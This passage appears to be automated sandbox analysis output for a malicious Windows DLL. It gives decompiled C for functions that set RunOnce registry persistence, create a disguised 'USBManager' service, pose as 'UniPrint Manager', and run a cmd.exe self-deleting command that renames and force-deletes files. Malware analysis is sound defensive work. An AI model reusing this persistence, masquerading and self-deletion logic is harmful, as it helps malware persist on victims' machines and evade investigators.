                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334D61
                                                                                                                        • wsprintfA.USER32 ref: 6F334D7A
                                                                                                                        • RegQueryValueExA.ADVAPI32 ref: 6F334DB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 6F334DC1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334DC4
                                                                                                                        • RegQueryValueExA.ADVAPI32(009973A5,009973A5,00000000,?,00000000,?), ref: 6F334DE4
                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 6F334DEC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E02
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E05
                                                                                                                        • RegSetValueExA.ADVAPI32(00000000,009973A5,00000000,00000001,00000000,?), ref: 6F334E25
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F334E2E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F334E31
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Value$AllocFree$ByteCharMultiQueryWidewsprintf$CloseCreateDeletelstrcmpi
                                                                                                                        • String ID: "%s" f$%s\%s$RunO$nce
                                                                                                                        • API String ID: 5215680-3682672340
                                                                                                                        • Opcode ID: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction ID: 3f126947d0bee041aa488b919a6a471a3df25b4e8b0900cda6c68f3e89514c92
                                                                                                                        • Opcode Fuzzy Hash: 4ee67e902b87192e15e7a7d3d7ff65f5d598896b9118ae86d8434ea793be3f45
                                                                                                                        • Instruction Fuzzy Hash: 7D418DB2604745ABD720DB65DC88E6B7BBDFBCAB14F00450CF95497240EA72E815CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3352B0, Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 97memorysleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 71%
                                                                                                                        			E6F3352B0(void* __ebp, intOrPtr _a4) {
				char _v256;
				char _v264;
				long _v268;
				void* __ebx;
				void* __edi;
				intOrPtr _t7;
				void* _t14;
				long _t19;
				void* _t25;
				intOrPtr _t28;
				char _t29;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr _t36;
				void* _t37;
				void* _t38;
				long* _t40;
				long* _t41;

				_t40 =  &_v268;
				_t36 = _a4;
				if(M6F34050C != 0 || _t36 != 0) {
					E6F334130();
				}
				_t7 = M6F340544; // 0x1
				if(_t7 != 0 && (M6F340540 != 0 || _t36 != 0)) {
					_t30 = M6F340534; // 0x98a1a0
					_push(1);
					_push(L"Printer manager");
					E6F334C30(_t7, _t30, L"UniPrint Manager");
					_t40 =  &(_t40[5]);
				}
				_push(_t25);
				_push(_t33);
				_push(0);
				_push(0);
				E6F3344D0(_t25, _t33);
				_t31 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
				E6F332DF0(_t31, ".pdll");
				_t41 =  &(_t40[4]);
				Sleep(0xfa0);
				_t37 = HeapAlloc(GetProcessHeap(), 8, 0x400);
				if(_t37 != 0) {
					_v268 = GetTickCount();
					_t19 = RtlRandom( &_v268);
					_t29 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
					wsprintfA(_t37, "/c ren \"%s*.*\" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q \"%s*.*\"", _t29, _t19, 0xa, _t29);
					_push(0);
					_push(0);
					_push(0);
					E6F334230(0, "cmd.exe", _t37);
					_t41 =  &(_t41[0xc]);
					HeapFree(GetProcessHeap(), 0, _t37);
				}
				_t28 = M6F34057C; // 0x784250
				wsprintfA( &_v264, "%s%s%c", "Global\\", _t28, 0x4b);
				_t14 = OpenEventA(2, 0,  &_v256);
				_t38 = _t14;
				if(_t38 != 0) {
					SetEvent(_t38);
					return CloseHandle(_t38);
				}
				return _t14;
			}






















                                                                                                                        0x6f3352b0
                                                                                                                        0x6f3352be
                                                                                                                        0x6f3352c5
                                                                                                                        0x6f3352cb
                                                                                                                        0x6f3352cb
                                                                                                                        0x6f3352d0
                                                                                                                        0x6f3352d7
                                                                                                                        0x6f3352e6
                                                                                                                        0x6f3352ec
                                                                                                                        0x6f3352ee
                                                                                                                        0x6f3352fa
                                                                                                                        0x6f3352ff
                                                                                                                        0x6f3352ff
                                                                                                                        0x6f335302
                                                                                                                        0x6f335303
                                                                                                                        0x6f335304
                                                                                                                        0x6f335306
                                                                                                                        0x6f335308
                                                                                                                        0x6f33530d
                                                                                                                        0x6f335319
                                                                                                                        0x6f33531e
                                                                                                                        0x6f335326
                                                                                                                        0x6f335348
                                                                                                                        0x6f33534c
                                                                                                                        0x6f335354
                                                                                                                        0x6f33535d
                                                                                                                        0x6f335363
                                                                                                                        0x6f335374
                                                                                                                        0x6f335376
                                                                                                                        0x6f335378
                                                                                                                        0x6f33537a
                                                                                                                        0x6f335384
                                                                                                                        0x6f335389
                                                                                                                        0x6f335392
                                                                                                                        0x6f335392
                                                                                                                        0x6f335398
                                                                                                                        0x6f3353b0
                                                                                                                        0x6f3353be
                                                                                                                        0x6f3353c4
                                                                                                                        0x6f3353ca
                                                                                                                        0x6f3353cd
                                                                                                                        0x00000000
                                                                                                                        0x6f3353d4
                                                                                                                        0x6f3353e1

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000FA0), ref: 6F335326
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 6F335339
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33533C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33534E
                                                                                                                        • RtlRandom.NTDLL(?), ref: 6F33535D
                                                                                                                        • wsprintfA.USER32 ref: 6F335374
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33538F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F335392
                                                                                                                        • wsprintfA.USER32 ref: 6F3353B0
                                                                                                                        • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6F3353BE
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 6F3353CD
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F3353D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$EventProcesswsprintf$AllocCloseCountFreeHandleOpenRandomSleepTick
                                                                                                                        • String ID: %s%s%c$.pdll$/c ren "%s*.*" *.*.%lu.bak & ping 1.1.1.1 -n %u & del /f /q "%s*.*"$Global\$PBx$Printer manager$UniPrint Manager$cmd.exe
                                                                                                                        • API String ID: 1614445722-4243253615
                                                                                                                        • Opcode ID: ba37e0c0f02a68561fffb622586f4a8f2ac996f22f6025285a002598ccb8c806
                                                                                                                        • Instruction ID: 3eeff7da2809fba3f8b062ba8bb9e4adb4a81316cc12832d6a9a884bedf6cb9d
                                                                                                                        • Opcode Fuzzy Hash: ba37e0c0f02a68561fffb622586f4a8f2ac996f22f6025285a002598ccb8c806
                                                                                                                        • Instruction Fuzzy Hash: 64315BB3E00BA57BE620E764DC09F5B376DEB46B20F000108F910AB2C0DBB5F4248BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331100, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 142memoryfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 92%
                                                                                                                        			E6F331100(intOrPtr _a4, intOrPtr _a8) {
				short _v512;
				short _v520;
				short _v1036;
				short _v1040;
				short _v1044;
				short _v1048;
				short _v1052;
				intOrPtr _t24;
				WCHAR* _t39;
				void* _t41;
				intOrPtr _t65;
				void* _t67;
				void* _t73;
				void* _t75;
				long* _t77;

				_t24 = _a4;
				 *_t77 = 0;
				if(_t24 != 2) {
					if(_t24 != 3) {
						goto L16;
					} else {
						CloseHandle( *(_a8 + 0x14));
						return 1;
					}
				} else {
					_t71 = _a8;
					_v1052 =  *(_a8 + 0x10);
					_t75 = E6F33A360( *((intOrPtr*)( *(_a8 + 0x10) + 4)), 0, 0);
					_t77 =  &(_t77[3]);
					if(_t75 != 0) {
						_t73 = E6F33A360( *((intOrPtr*)(_t71 + 4)), ( *(_t71 + 0x1c) & 0x0000ffff) >> 0x00000007 & 0x00000001, 0);
						_t77 =  &(_t77[3]);
						if(_t73 != 0) {
							wsprintfW( &_v1048, L"\\\\.\\%s%s", _t75, _t73);
							_t77 =  &(_t77[4]);
							PathRemoveFileSpecW( &_v1040);
							PathAddBackslashW( &_v1040);
							_t39 =  &_v1040;
							__imp__SHCreateDirectoryExW(0, _t39, 0, _t67);
							if(_t39 == 0 || _t39 == 0x50 || _t39 == 0xb7) {
								wsprintfW( &_v1052, L"\\\\.\\%s%s", _t75, _t73);
								_t77 =  &(_t77[4]);
								_t41 = CreateFileW( &_v1044, 0xc0000000, 0, 0, 4, 0x80, 0);
								if(_t41 != 0xffffffff) {
									L11:
									_v1052 = _t41;
								} else {
									if( *_v1048 != 0 && GetFileAttributesW( &_v1044) != 0xffffffff) {
										_t65 =  *0x6f340270; // 0x0
										wsprintfW( &_v520, L"%s%c%lu%s",  &_v1044, 0x2e, _t65, L".bak");
										_t77 =  &(_t77[6]);
										if(MoveFileExW( &_v1036,  &_v512, 0) != 0) {
											_t41 = CreateFileW( &_v1036, 0xc0000000, 0, 0, 4, 0x80, 0);
											if(_t41 != 0xffffffff) {
												goto L11;
											}
										}
									}
								}
							}
							HeapFree(GetProcessHeap(), 0, _t73);
						}
						HeapFree(GetProcessHeap(), 0, _t75);
					}
					L16:
					return  *_t77;
				}
			}


















                                                                                                                        0x6f331106
                                                                                                                        0x6f33110d
                                                                                                                        0x6f331117
                                                                                                                        0x6f33129b
                                                                                                                        0x00000000
                                                                                                                        0x6f33129d
                                                                                                                        0x6f3312a8
                                                                                                                        0x6f3312b9
                                                                                                                        0x6f3312b9
                                                                                                                        0x6f33111d
                                                                                                                        0x6f33111f
                                                                                                                        0x6f33112b
                                                                                                                        0x6f33113a
                                                                                                                        0x6f33113c
                                                                                                                        0x6f331141
                                                                                                                        0x6f33115d
                                                                                                                        0x6f33115f
                                                                                                                        0x6f331164
                                                                                                                        0x6f33117d
                                                                                                                        0x6f33117f
                                                                                                                        0x6f331187
                                                                                                                        0x6f331192
                                                                                                                        0x6f33119a
                                                                                                                        0x6f3311a1
                                                                                                                        0x6f3311a9
                                                                                                                        0x6f3311c8
                                                                                                                        0x6f3311d0
                                                                                                                        0x6f3311ea
                                                                                                                        0x6f3311ef
                                                                                                                        0x6f331266
                                                                                                                        0x6f331266
                                                                                                                        0x6f3311f1
                                                                                                                        0x6f3311f8
                                                                                                                        0x6f33120a
                                                                                                                        0x6f33122a
                                                                                                                        0x6f33122c
                                                                                                                        0x6f331246
                                                                                                                        0x6f33125f
                                                                                                                        0x6f331264
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331264
                                                                                                                        0x6f331246
                                                                                                                        0x6f3311f8
                                                                                                                        0x6f33126a
                                                                                                                        0x6f331275
                                                                                                                        0x6f33127b
                                                                                                                        0x6f331286
                                                                                                                        0x6f331286
                                                                                                                        0x6f33128e
                                                                                                                        0x6f331297
                                                                                                                        0x6f331297

                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F3312A8
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000000,74786900,6F3339D7,?,00000000,00000000), ref: 6F33A37F
                                                                                                                          • Part of subcall function 6F33A360: GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                          • Part of subcall function 6F33A360: HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                          • Part of subcall function 6F33A360: MultiByteToWideChar.KERNEL32(6F3339D7,00000000,00000000,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        • wsprintfW.USER32 ref: 6F33117D
                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?), ref: 6F331187
                                                                                                                        • PathAddBackslashW.SHLWAPI(?), ref: 6F331192
                                                                                                                        • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 6F3311A1
                                                                                                                        • wsprintfW.USER32 ref: 6F3311C8
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F3311EA
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F3311FF
                                                                                                                        • wsprintfW.USER32 ref: 6F33122A
                                                                                                                        • MoveFileExW.KERNEL32(?,?,00000000), ref: 6F33123E
                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 6F33125F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33126E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331275
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33127F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F331286
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$File$CreateProcesswsprintf$ByteCharFreeMultiPathWide$AllocAttributesBackslashCloseDirectoryHandleMoveRemoveSpec
                                                                                                                        • String ID: %s%c%lu%s$.bak$\\.\%s%s
                                                                                                                        • API String ID: 452034401-1383541090
                                                                                                                        • Opcode ID: f3ecaa0985d5cd4be74035b0c356dd03693a1fcb47ccd40629ccc27ff52548a0
                                                                                                                        • Instruction ID: 63b981e06f3eb6282e5fb6294b6f91e10a03dd73e991e1b444485a580a32a779
                                                                                                                        • Opcode Fuzzy Hash: f3ecaa0985d5cd4be74035b0c356dd03693a1fcb47ccd40629ccc27ff52548a0
                                                                                                                        • Instruction Fuzzy Hash: 2541C273A04394ABD720EBA0CC85FAB77ACEB48B20F004A0CF655D61C0D7B5E414C7A6
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F337F10, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 125memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 56%
                                                                                                                        			E6F337F10(void* __ebp, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct HWND__* _a20) {
				void* _t7;
				struct HWND__* _t8;
				struct HWND__* _t11;
				void* _t16;
				intOrPtr _t29;
				intOrPtr _t31;
				void* _t33;
				void* _t35;
				struct HINSTANCE__* _t40;
				struct HWND__* _t41;
				void* _t45;
				void* _t46;
				void* _t47;

				_t45 = __ebp;
				_t29 = _a8;
				if(_t29 == 0x275b || _t29 == 0x2755 || _t29 == 0x2ae1) {
					__eflags = 0;
					return 0;
				} else {
					_t40 = _a4;
					_t7 = E6F334E50(_t40, _t29);
					_t47 = _t46 + 8;
					_t35 = _t7;
					_t8 = _a20;
					_push(_t8);
					_push(_a16);
					_push(_a12);
					if(_t35 == 0) {
						_push(_t29);
						_push(_t40);
						M6F3405E8();
						_t41 = _t8;
					} else {
						_t41 = CreateDialogIndirectParamW(_t40, _t35, ??, ??, ??);
						HeapFree(GetProcessHeap(), 0, _t35);
					}
					if(_t41 == 0) {
						L17:
						return _t41;
					} else {
						SetWindowTextA(_t41, 0x6f33d664);
						if(_t29 != 0x2872) {
							__eflags = _t29 - 0x2768;
							if(_t29 != 0x2768) {
								goto L17;
							} else {
								_t11 = GetDlgItem(_t41, 0x4e7d);
								_push(0);
								_push(0);
								__eflags = _t11;
								if(_t11 == 0) {
									PostMessageA(_t41, 0x10, ??, ??);
									goto L17;
								} else {
									PostMessageA(_t11, 0xf5, ??, ??);
									return _t41;
								}
							}
						} else {
							_t56 = M6F3404B4;
							if(M6F3404B4 != 0) {
								E6F3352B0(_t45, 1);
								_t47 = _t47 + 4;
								ExitProcess(0);
							}
							_push(0);
							E6F3328B0(".pdll");
							_t16 = M6F340534; // 0x98a1a0
							_t31 = M6F340544; // 0x1
							_push(0);
							_push(L"Printer manager");
							M6F340540 = E6F334C30(_t31, _t16, L"UniPrint Manager");
							M6F34050C = E6F333C60();
							E6F334CA0(_t56, 0);
							if(M6F3404AC != 0) {
								_t33 = M6F340534; // 0x98a1a0
								_push(0xffffffff);
								E6F333610(_t33);
								ExitProcess(0);
							}
							 *0x6f340398 = _t41;
							CallWindowProcW(E6F337790, _t41, 0x83fc, GetWindowLongW(_t41, 0xfffffffc), 0);
							SetWindowLongW(_t41, 0xfffffffc, E6F337790);
							return _t41;
						}
					}
				}
			}
















                                                                                                                        0x6f337f10
                                                                                                                        0x6f337f11
                                                                                                                        0x6f337f1b
                                                                                                                        0x6f33809e
                                                                                                                        0x6f3380a1
                                                                                                                        0x6f337f39
                                                                                                                        0x6f337f3a
                                                                                                                        0x6f337f41
                                                                                                                        0x6f337f4e
                                                                                                                        0x6f337f51
                                                                                                                        0x6f337f53
                                                                                                                        0x6f337f57
                                                                                                                        0x6f337f58
                                                                                                                        0x6f337f59
                                                                                                                        0x6f337f5c
                                                                                                                        0x6f337f7a
                                                                                                                        0x6f337f7b
                                                                                                                        0x6f337f7c
                                                                                                                        0x6f337f82
                                                                                                                        0x6f337f5e
                                                                                                                        0x6f337f69
                                                                                                                        0x6f337f72
                                                                                                                        0x6f337f72
                                                                                                                        0x6f337f86
                                                                                                                        0x6f338096
                                                                                                                        0x6f33809b
                                                                                                                        0x6f337f8c
                                                                                                                        0x6f337f92
                                                                                                                        0x6f337f9e
                                                                                                                        0x6f33805d
                                                                                                                        0x6f338063
                                                                                                                        0x00000000
                                                                                                                        0x6f338065
                                                                                                                        0x6f33806b
                                                                                                                        0x6f338071
                                                                                                                        0x6f338073
                                                                                                                        0x6f338075
                                                                                                                        0x6f338077
                                                                                                                        0x6f338090
                                                                                                                        0x00000000
                                                                                                                        0x6f338079
                                                                                                                        0x6f33807f
                                                                                                                        0x6f33808a
                                                                                                                        0x6f33808a
                                                                                                                        0x6f338077
                                                                                                                        0x6f337fa4
                                                                                                                        0x6f337fa4
                                                                                                                        0x6f337fab
                                                                                                                        0x6f337faf
                                                                                                                        0x6f337fb4
                                                                                                                        0x6f337fb9
                                                                                                                        0x6f337fb9
                                                                                                                        0x6f337fbf
                                                                                                                        0x6f337fc6
                                                                                                                        0x6f337fcb
                                                                                                                        0x6f337fd0
                                                                                                                        0x6f337fd6
                                                                                                                        0x6f337fd8
                                                                                                                        0x6f337fe9
                                                                                                                        0x6f337ff5
                                                                                                                        0x6f337ffa
                                                                                                                        0x6f338009
                                                                                                                        0x6f33800b
                                                                                                                        0x6f338011
                                                                                                                        0x6f338014
                                                                                                                        0x6f33801e
                                                                                                                        0x6f33801e
                                                                                                                        0x6f338029
                                                                                                                        0x6f338041
                                                                                                                        0x6f33804f
                                                                                                                        0x6f33805a
                                                                                                                        0x6f33805a
                                                                                                                        0x6f337f9e
                                                                                                                        0x6f337f86

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F334E50: FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                          • Part of subcall function 6F334E50: LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                          • Part of subcall function 6F334E50: SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                          • Part of subcall function 6F334E50: LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                          • Part of subcall function 6F334E50: GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                          • Part of subcall function 6F334E50: HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                          • Part of subcall function 6F334E50: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                          • Part of subcall function 6F334E50: FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        • CreateDialogIndirectParamW.USER32 ref: 6F337F60
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F337F6B
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F337F72
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(00000140,00000140), ref: 6F3328C2
                                                                                                                          • Part of subcall function 6F3328B0: RtlZeroMemory.NTDLL(?,00000208), ref: 6F3328D4
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F3328F3
                                                                                                                          • Part of subcall function 6F3328B0: wsprintfA.USER32 ref: 6F332911
                                                                                                                          • Part of subcall function 6F3328B0: FindFirstFileA.KERNEL32(?,?), ref: 6F332923
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D538), ref: 6F332950
                                                                                                                          • Part of subcall function 6F3328B0: lstrcmpA.KERNEL32(?,6F33D534), ref: 6F332960
                                                                                                                          • Part of subcall function 6F3328B0: lstrcatA.KERNEL32(?,?), ref: 6F332973
                                                                                                                          • Part of subcall function 6F3328B0: DeleteFileA.KERNEL32(?), ref: 6F33298C
                                                                                                                          • Part of subcall function 6F3328B0: FindNextFileA.KERNEL32(00000000,?), ref: 6F3329AD
                                                                                                                          • Part of subcall function 6F3328B0: FindClose.KERNEL32(00000000), ref: 6F3329B8
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6F333C7E
                                                                                                                          • Part of subcall function 6F333C60: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F333C8C
                                                                                                                          • Part of subcall function 6F333C60: OpenServiceA.ADVAPI32(00000000,USBManager,000F01FF), ref: 6F333CAA
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333CEF
                                                                                                                          • Part of subcall function 6F333C60: CreateServiceA.ADVAPI32(?,USBManager,USB Ports Manager,000F01FF,00000020,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6F333D1E
                                                                                                                          • Part of subcall function 6F333C60: ChangeServiceConfig2A.ADVAPI32 ref: 6F333D74
                                                                                                                          • Part of subcall function 6F333C60: wsprintfA.USER32 ref: 6F333D95
                                                                                                                          • Part of subcall function 6F334CA0: wsprintfA.USER32 ref: 6F334CEC
                                                                                                                          • Part of subcall function 6F334CA0: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 6F334CF9
                                                                                                                          • Part of subcall function 6F334CA0: HeapFree.KERNEL32(00000000), ref: 6F334CFC
                                                                                                                          • Part of subcall function 6F334CA0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,000F023F,00000000,?,00000000), ref: 6F334D1F
                                                                                                                          • Part of subcall function 6F334CA0: RegDeleteValueA.ADVAPI32(?,009973A5), ref: 6F334D42
                                                                                                                          • Part of subcall function 6F334CA0: RegCloseKey.ADVAPI32(?), ref: 6F334E3C
                                                                                                                        • SetWindowTextA.USER32(00000000,6F33D664), ref: 6F337F92
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F337FB9
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33801E
                                                                                                                        • GetWindowLongW.USER32(00000000,000000FC), ref: 6F33802F
                                                                                                                        • CallWindowProcW.USER32(Function_00007790,00000000,000083FC,00000000), ref: 6F338041
                                                                                                                        • SetWindowLongW.USER32 ref: 6F33804F
                                                                                                                          • Part of subcall function 6F333610: CreateEnvironmentBlock.USERENV ref: 6F333641
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL(?,00000044), ref: 6F33365B
                                                                                                                          • Part of subcall function 6F333610: RtlZeroMemory.NTDLL ref: 6F333677
                                                                                                                          • Part of subcall function 6F333610: CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6F3336A6
                                                                                                                          • Part of subcall function 6F333610: Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6F3336B1
                                                                                                                          • Part of subcall function 6F333610: DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6F3336E4
                                                                                                                          • Part of subcall function 6F333610: CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6F3336EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess$CreateMemoryResourcewsprintf$FindWindowZero$CloseFileFreeOpenService$BlockDeleteEnvironmentExitLongManagerlstrcmp$AllocCallChangeConfig2DestroyDialogFirstHandleIndirectLoadLockMoveNextParamProcSizeofSleepTextUserValuelstrcat
                                                                                                                        • String ID: .pdll$Printer manager$UniPrint Manager
                                                                                                                        • API String ID: 2623091544-3698302044
                                                                                                                        • Opcode ID: 2dda20ddb9e3a5e4c6f93f7d993a011760b35b1ea0e7c07fd96946657ab8e5f8
                                                                                                                        • Instruction ID: 5ac0fd2c4ae1d0d529d9b13a194f54f51ff00cb1a03183b8a530f83bacc646c9
